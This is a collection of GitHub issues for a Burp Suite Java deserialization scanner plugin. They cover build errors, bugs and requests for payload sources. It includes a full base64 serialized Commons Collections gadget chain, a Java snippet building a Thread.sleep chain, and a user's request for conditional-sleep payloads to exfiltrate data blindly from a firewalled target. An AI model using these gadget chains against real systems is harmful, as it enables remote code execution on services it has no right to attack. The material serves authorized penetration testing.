federicodotta / java-deserialization-scanner Goto Github PK

Hi Frederico,

sorry that I make this an issue - I wasn't able to find your contact details. I found a vulnerable service during a penetration test using your plugin - I wanted to ask you where I can find the source code of the test payloads? I would like to create a proof-of-concept exploit for the customer.

You say in the description that you expanded on the ysoserial test payloads - how exactly did you do that?

Thanks
Thomas

It will be really helpful to know what is the raw plain text decoded value of the below mentioned payload is. this is used as payload for deserialization scanner for burp in github.

rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAA3NyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAATXQAJnlzb3NlcmlhbC5wYXlsb2Fkcy5Db21tb25zQ29sbGVjdGlvbnM1dAAYQ29tbW9uc0NvbGxlY3Rpb25zNS5qYXZhdAAJZ2V0T2JqZWN0c3EAfgALAAAAAXEAfgANcQB-AA5xAH4AD3NxAH4ACwAAACZ0ABl5c29zZXJpYWwuR2VuZXJhdGVQYXlsb2FkdAAUR2VuZXJhdGVQYXlsb2FkLmphdmF0AARtYWluc3IAJmphdmEudXRpbC5Db2xsZWN0aW9ucyRVbm1vZGlmaWFibGVMaXN0_A8lMbXsjhACAAFMAARsaXN0cQB-AAd4cgAsamF2YS51dGlsLkNvbGxlY3Rpb25zJFVubW9kaWZpYWJsZUNvbGxlY3Rpb24ZQgCAy173HgIAAUwAAWN0ABZMamF2YS91dGlsL0NvbGxlY3Rpb247eHBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhxAH4AGnhzcgA0b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmtleXZhbHVlLlRpZWRNYXBFbnRyeYqt0ps5wR_bAgACTAADa2V5cQB-AAFMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB-AAF4cHZyABBqYXZhLmxhbmcuVGhyZWFkAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh-j_a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXEAfgAFWwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AAVzbGVlcHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAXZyAARsb25nAAAAAAAAAAAAAAB4cHQACWdldE1ldGhvZHVxAH4AMgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB-ADJzcQB-ACt1cQB-AC8AAAACdXEAfgAyAAAAAXEAfgA1dXEAfgAvAAAAAXNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAnEHQABmludm9rZXVxAH4AMgAAAAJ2cgAQamF2YS5sYW5nLk9iamVjdAAAAAAAAAAAAAAAeHB2cQB-AC9zcQB-ACdzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHEAfgBAAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHg

When there is an error loading ysoserial, in the exploitation tab we can see the corresponding error message, but in the manual tab it just lists every payload as not vulnerable.

sampleCommonsCollections3.war
sampleCommonsCollections4.war
sampleHibernate5.war
sampleJdk7.war
sampleJSON.war
sampleRome.war
sampleSpring.war
How to use DS to work?
Can you give me steps on one testcase?
Thank you

While doing a vulnerable lab the scanner detected RCE using CommonsCollections3 alt payloads 3 and 4 with gzip and base64. Exploitation was failing. A colleague suggested I brute force the library instead of trusting the scan results and I ended up exploiting the lab with CommonsCollections6.

I don't know a ton about java, or these libs, but I wanted to make an issue for this and dig into it, sharing my findings here for others that run into this issue.

Hey there. Thank you for releasing this tool-- it seems quite useful and I appreciate the documentation in the README!

My apologies if this is an obvious question, but I'm having some difficulty building this tool from source.

• I see the JARs one can download via the Releases tab, but I'd like to build from source if possible.
• I see ant/antbuild.xml - but it seems to expect existing .class files to be in bin/, which it then zips up with JARs in libs/ into the final JAR.

Progress Building from Source

I believe I'm close, as I've compiled the Java source into bin/ with:

$ javac -d bin/ -cp src/burp/*

Then the JAR can be built with:

$ ant -f ant/antbuild.xml

Which successfully builds output/JavaDeserializationScanner_dev.jar.

Observed Errors

However, when I try to add this JAR via Burp Extender, I get the following error:

java.lang.ClassNotFoundException: burp.BurpExtender
	at java.net.URLClassLoader.findClass(URLClassLoader.java:381)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
	at java.lang.Class.forName0(Native Method)
	at java.lang.Class.forName(Class.java:348)
	at burp.p3e.a(Unknown Source)
	at burp.p3e.<init>(Unknown Source)
	at burp.vz.a(Unknown Source)
	at burp.dre.run(Unknown Source)
	at java.lang.Thread.run(Thread.java:745)

Environment

• java - openjdk version "1.8.0_111"
• javac - javac 1.8.0_111
• OS - Ubuntu 14.04
• Burp Suite Pro version 1.7.02beta

Any advice would be much appreciated, thanks!

Hi,

I was wondering, how did you generate the initial payloads, e.g. Hibernate 5 (Sleep). I tried to recreate those by using ysoserial without any luck.

Thank you for your help!

Hello Federico,

Thanks for providing this awesome tool!

I've been testing an application where the only payload that seems to work is Apache Commons Collections 3 Alternate payload 3 (Sleep). All outbound traffic is blocked on my target, so I need to manually modify this payload to sleep conditionally based on variable values / execution results to prove RCE.

However, I can't seem to find the source code for it. I tried all the gadgets in your ysoserial fork with sleep 10 and none of them seem to work for me. Would you mind sharing the source code you used to generate Apache Commons Collections 3 Alternate payload 3?

Thank you,
Alex

Hi Federico,

I have been trying to reverse engineer some of the hard-coded payloads as a learning experience and I am stuck trying to figure out the Rhino1 (Sleep) payload. I attempted to modify the MozillaRhino1 ysyoserial payload (actually, the Gadgets.createTemplateImpl) to create a Javassist class that invokes java.lang.Thread.sleep(10000L).

This seems to work but the generated serialized payload is not exactly the same as the one used by the Burp plugin. Just wondering what I might be doing differently or if you have the original in a git repo somewhere :)

Thank you!
~~ Peter

I have a hard time using the plugin because with Burp Suite v2021.4-6901 the plugin adds a CRLF in front of the tools own calculated content-length. It does also not replace any existing content-length.

Hi
How can I add another way to recognize the scanner?

Some sites use nginx and ping-dns cannot be used.

For example, adding cmd to the header like this exploit:
https://github.com/ShutdownRepo/CVE-2020-7961/blob/main/CVE-2020-7961.py

and see the result in the response.

Hi,

Thank you for awesome extension, it is very helpful.

How did you generate Java 8 (with no library) payloads? could you please point me the tool you used?
ysoserial doesn't have java 8 payload.

Thanks.

Hello,

How did you manage to generate the payload for "Apache Commons Collections 3 Alternate payload 3"?

I'm trying to execute the example payload and I've seen that it works perfectly. What I mean by that is that the page keeps loading for 10 seconds. (Only with this payload).

I've also seen that the payload has been added in the following commit: c47dda4

Best Regards,
Alex

entering the command Hibernate1 "sleep 5" in the exploiting tab results in ERROR IN YSOSERIAL COMMAND. Entering the same command directly to ysoserial "java -jar /usr/share/java/ysoserial-v0.0.5.jar Hibernate1 "sleep 5" " works perfectly.

Does anyone else have this error when using the latest Burp release, 2020.4, on Windows? After clicking the "Attack" button in the "Exploiting" tab, I encountered the below error message:

Error while generating or serializing payload
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
	at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
	at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:17)
	at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:45)
	at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
	at ysoserial.payloads.util.Gadgets.createMemoitizedProxy(Gadgets.java:67)
	at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:148)
	at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:43)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:59)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
	at com.nqzero.permit.Permit.<init>(Permit.java:222)
	at com.nqzero.permit.Permit.build(Permit.java:117)
	at com.nqzero.permit.Permit.<clinit>(Permit.java:16)
	... 7 more

I found this is already an open issue for the ysoserial project and can be fixed by using Java 8: (frohoff/ysoserial#136)

I did not use this extension before upgrading to the latest Burp Suite release, but the release notes state that Java 8 is no longer supported: https://portswigger.net/burp/releases/professional-community-2020-4

If other users encounter this error when running the latest Burp release, perhaps we must wait until ysoserial supporting newer Java versions.

Hi Federico,

First of all, thank you for your amazing scanner! It detected a vulnerability in my pentesting target using the Apache Commons Collections 3 Alternate Payload 2 (and 3) that I certainly would not have found otherwise. I was able to replicate its payload myself by modifying ysoserial's CommonsCollections5.java file based on the code snippet you included in #10 .

Unfortunately for me, my target appears to be firewalled and I have been unsuccessful in pinging my host or doing DNS lookups. For this reason, I am hoping to modify the gadget chain in the link above to sleep conditionally, as one might do with blind SQLi. For example, the payload would be of the following structure:

(read current directory name)
(if current directory name starts with "a", sleep 5 seconds)

or more generally

(execute commands to establish if a certain condition is true/false)
(sleep if true)

as opposed to just

(sleep 5 seconds).

I have been unsuccessful in doing this, despite a number of different attempts. I have tried to change one of the InvokerTransformers to a SwitchTransformer (in hopes of defining an appropriate predicate), but regardless of what I change ysoserial throws me a serialization error when I attempt to use my compiled .jar file.

I have also looked at the yolosec blind fork of ysoserial, which includes functionality for such cases. However, my Java knowledge is insufficient to understand the gadget chaining they are doing to the level where I can modify it for my own purposes.

For this reason, I am creating this issue here to ask if you have any advice or sample payloads for creating the above gadget chain using the structure of #10 . I recognize blind exfiltration is outside the scope of this scanner, but regardless I would appreciate any input on this issue. Hopefully it can also help others who find a similar issue in their testing.

Thank you for your time!

Hi,

When we choose different payload encode methods, the results give us a different result.

If we choose "Attack(Base64)" or "Attack(Ascii Hex)", it will show "Apache Commons Collections 3 Alternate payload 2: NOT vulnerable."

However, if we choose "Attack", the result will show "Apache Commons Collections 3 Alternate payload 2: Potentially VULNERABLE!!!"

Does it indicate a false positive?

In addition, if convenient, could you tell how you generate this default payload? Is it using Commons Collections 5?

Thank you very much.

Burp Version: Professional 2.0.11beta
Java Deserialization Scanner v0.5
ysoserial-0.0.6-SNAPSHOT-all.jar
compiled (on Windows) as follows:
mvn clean package -DskipTests -Dhibernate5

Noticed a problem where due to a typo, the extension gets into a state where the buttons are grayed out and there is no apparent way to bring them back

To Reproduce:
in "Exploiting" tab, type invalid payload name (like Hibernaee1) and click exploit. Buttons become gray as if it is working but they never come back until I restart Burp or uninstall the extension and re-install it.

Hello,

First of all, thank you for creating such nice extension.

I used Deserialization-Scanner efficiently with applications which potentially are vulnerable to Insecure JAVA Deserialization. Although after update of Burp Suite to the recent version, extension is not working any more.

For a proof, application vulnerable to Insecure JAVA Deserialization was tested manually and in exploiting tab, but extension did not show the issue is present. For tested scope was used Practice Burp Exam, which is vulnerable to Insecure JAVA Deserialization definitely.

Manual testing tab

Exploiting tab

As I can see this problem is the same for other users, so the question is do you support this extension and can you help users to make it working?

Best Regards,
Lilia

ascii hex magic selected for detection translates to "aced" in ASCII which could be very well be a variable name or portion of text in variable. example variable name placed would be detected as serialized object.

not sure how to tackle it

Hi,
just a couple of doubts:

• why does Burp BAPP Store say you need Burp Pro for this extension, when I was able to download it and add the jar manually, and it seems to work?
• why does the extension say version 0.5 (in the "Show in UI" output in Burp, when I load it), when it should be 0.6? Just a typo?

Cheers.

Hello,

I wanted to point that it would be good to know what version of java was used to generate each payload. I think that i can help to craft some custom payloads.

Kind regards!

BApp Version - 1.7.36
While installing The extension you uploaded after cloning I am facing an error stating:
BApp Verification failed- The BApp may have been tampered with.

Please resolve this issue.

Is it possible to add to detect ruby Deserialization vulnerability

reference: https://www.elttam.com.au/blog/ruby-deserialization/

change the content type to
Content-Type:application/xml

and sending the gadget chain to test.

So... This lab has a java deserialization in the cookie, which is base64 + url encoded
https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-java-deserialization-with-apache-commons
When I send the request to Java deserialization scanner and I set the cookie as insertion point, and I do manual testing, it cannot find any vulnerability. Burp logger shows why: all requests return 403 forbidden and Newlines in headers are not allowed in the body.
The funny thing is that if I send the same request to Repeater, it receives a 500 Internal server error (correctly).
When I send the JavaDeserializationScanner request from Logger to Comparer, and I compare it with the one from Repeater, I can see the difference: in the one sent by Repeater there is an extra byte %0d before a %0a, exactly between the end of the serialized cookie and the beginning of the next Header (Cache-control). It looks like that just by sending the request that received 403 Forbidden, from Logger to Repeater, a %0d is added automatically and that fixes the "Newlines in headers are not allowed" error.
Very weird... not sure why JavaDeserializationScanner fails: I think it's related to setting the insertion point. Even more weird the fact that with an automatic scan (scan insertion points - extensions only), the extension correctly finds the deserialization vulnerability
Using the latest ysoserial-master-8eb5cbfbf6-1.jar and java 11.

Hi.

I love your extension and wonder why hasn't this showed up in the extender tab yet...

I have encountered two problems in manuel scanning:

1. It doesn't update the content-length header if already present. Another content-length header is added. This can cause problems with webservers honoring the first and not the second content-length header. I've encountered one today :)

2. A newline is inserted between the last header and content length. This can also cause problems with servers. I've encountered one today as well :)

Please see attached file.

Hi Federico!
I'm using your scanner and seems amazing! Thanks for your work.

I'm in a situation in which only the payload "Apache Commons Collections 3 Alternate payload 2" (added in commit: 4a29cc3 in src/burp/BurpExtender.java row 159 ) of you scanner causes the web application to sleep for 10 seconds, but I'm not able to replicate this payload.

To understand why only the "native sleep payload" fires, I'm trying to craft the chain myself, by modifying ysoserial's code. In particular I've tryied this chain in CommonsCollections5.java :

public BadAttributeValueExpException getObject(final String command) throws Exception {
		final Transformer transformerChain = new ChainedTransformer(
		        new Transformer[]{ new ConstantTransformer(1) });
		final Transformer[] transformers = new Transformer[] {
		new ConstantTransformer(Thread.class),
		new InvokerTransformer("getMethod",
		        new Class[]{
		                String.class, Class[].class
		        },
		        new Object[]{
		                "sleep", new Class[]{Long.TYPE}
		        }),
		new InvokerTransformer("invoke",
		        new Class[]{
		                Object.class, Object[].class
		        }, new Object[]
		        {
		                null, new Object[] {10000L}
		        }),
		new ConstantTransformer(1) };
		final Map innerMap = new HashMap();

		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
		
		TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
		
		BadAttributeValueExpException val = new BadAttributeValueExpException(null);
		Field valfield = val.getClass().getDeclaredField("val");
		valfield.setAccessible(true);
		valfield.set(val, entry);

		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

		return val;
	}

This gives me a payload quite identical to your, but it does not work!

I would like to know how you generated the payload, can you help me?
Many thanks!

py

I found this Apache Commons Collections 3 Alternate payload 2 (Sleep) as vulnerability while running the Burp . Can I know the command/payload (raw) used for this? Or how I can generate the payload using ysoserial.